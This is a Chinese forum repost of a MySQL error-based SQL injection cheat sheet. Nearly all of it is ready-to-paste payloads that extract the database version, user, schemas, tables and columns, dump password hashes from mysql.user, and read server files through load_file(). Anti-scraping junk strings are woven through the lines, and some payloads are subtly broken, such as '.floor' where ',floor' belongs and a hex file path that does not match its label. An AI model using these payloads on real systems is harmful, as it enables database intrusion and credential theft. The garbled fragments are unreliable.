Mysql暴错注入参考（pdf）

admin

本帖最后由 Nightmare 于 2013-3-17 14:20 编辑
* P& I5 c' T' B1 s. C% E, l5 u

. ]% _2 v7 a; i  y9 qMysql暴错注入参考（pdf），每天一贴。。。

/ z1 F8 S, K# z5 M8 e3 VMySql Error Based Injection Reference
' G& n9 c. K$ A, K: o[Mysql暴错注入参考]
Authornig0s1992
6 A8 y" T3 J9 lBlog:http://pnig0s1992.blog.51cto.com/
# q6 G$ ~9 k# z/ J0 c: R* @- XTeAm:http://www.FreeBuf.com/
# w" y- M7 Q4 j3 O; L9 Y& x# xMysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功
( f6 g' E# l% Q+ O7 q0 p小部分版本使用name_const()时会报错.可以用给出的Method.2测试
查询版本:
: [% O# K2 E* o5 x: eMethod.1:and+exists(select*from+(select*from(select+name_const(@@version,0))a+
: S% H5 y. N8 q# C) E' Ojoin+(select+name_const(@@version,0))b)c)
Method.2:and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(SELECT+version()))a+from+information_schema.tables+gro
up by a)b)
' ~; \$ h" Q+ h/ b) I; I查询当前用户:
Method.1:and+exists(select*from+(select*from(select+name_const(user(),0))a+join+(select+name_const(user(),0))b)c)
$ m6 N! g& I, D; ]Method.2:and+(select+1+from(select+count(*),concat((select+(select+user())+from+information_schema.tables+limit+0,1).floor(r
9 ]5 |1 T+ v+ a5 B; J- H% Pand(0)*2))x+from+information_schema.tables+group+by+x)a)
- k% b7 x5 k0 s; V- q% P; ]' p9 w查询当前数据库:
1 t" q+ i- F- H1 \& a( k/ e) eMethod.1:and+exists(select*from+(select*from(select+name_const(database(),0))a+join+(select+name_const(database(),0))b)c)
Method.2:and+(select+1+from(select+count(*),concat((select+(select+database())+from+information_schema.tables+limit+0,1).flo
) K( F" B9 R2 x& Q7 \or(rand(0)*2))x+from+information_schema.tables+group+by+x)a)
依次爆库and+exists(select*from+(select*from(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+
LIMIT+n,1),0))a+join+(select+name_const((SELECT+distinct+schema_name+FROM+information_schema.schemata+LIMIT+n,1),0))b)c) 将n
. v: |' P& L8 v顺序替换
4 _/ ~8 B4 W9 k/ G" c7 b爆指定库数目:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(table_name)+FROM+`information_schema`.tables+WHERE+t
able_schema=0x6D7973716C))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group
. R5 F* ~+ t7 E' B1 J) @+by+x)a)+and+1=1 0x6D7973716C=mysql
依次爆表:
and+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+table_name+FROM+information_schema.tables+Where+t
able_schema=0x6D7973716C+limit+n,1))+from+information_schema.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.ta
bles+group+by+x)a)+and+1=1
/ s4 Z( {% X( R/ s( ?* r& ^1 U/ }2 B( w0x6D7973716C=Mysql 将n顺序替换
0 _3 A5 Q3 d0 G# r爆表内字段数目:
$ _6 B! q& G" v; V+ c" [# xand+(select+1+from(select+count(*),concat((select+(select+(SELECT+count(column_name)+FROM+`information_schema`.columns+WHERE
+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976))+from+information_schema.tables+limit+0,1),floor(ran
. g' y' S) n- g0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
; P3 E+ f2 l9 c; A依次爆字段:
: @7 s3 Y! \  H1 R: t$ V+ Land+(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+column_name+FROM+information_schema.columns+Where
) i" G* G* H8 q* B' i8 F, i7 d+table_schema=0x6D7973716C+AND+table_name=0x636F6C756D6E735F70726976+limit+n,1))+from+information_schema.tables+limit+0,1
# n5 S% z7 Y8 I3 ~4 T, @loor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1  将n顺序替换
依次暴内容:
and+(select+1+from(select+count(*),concat((select+(select+(select+password+from+mysql.user+limit+n,1))+from+information_sche
) q6 b7 s1 b9 Z- zma.tables+limit+0,1).floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+1=1
将n顺序替换
6 Y$ z9 n' I2 w爆文件内容:
) ?1 Z& ^; P% h/ yand+(SELECT+1+FROM+(select count(*),concat(floor(rand(0)*2),(SELECT+substring(load_file(0x433A5C5C746573742E617361),1,64)))a
- o/ d% |: @- ifrom+information_schema.tables+group+by+a)b)
0x433A5C5C626F6F742E696E69=C:\\boot.ini 因为只能爆出64字节的内容,需要用Substring()控制显示的字节
Thx for reading.

不要下载也可以，
1 t8 Y7 P" e  R( @' P, L& k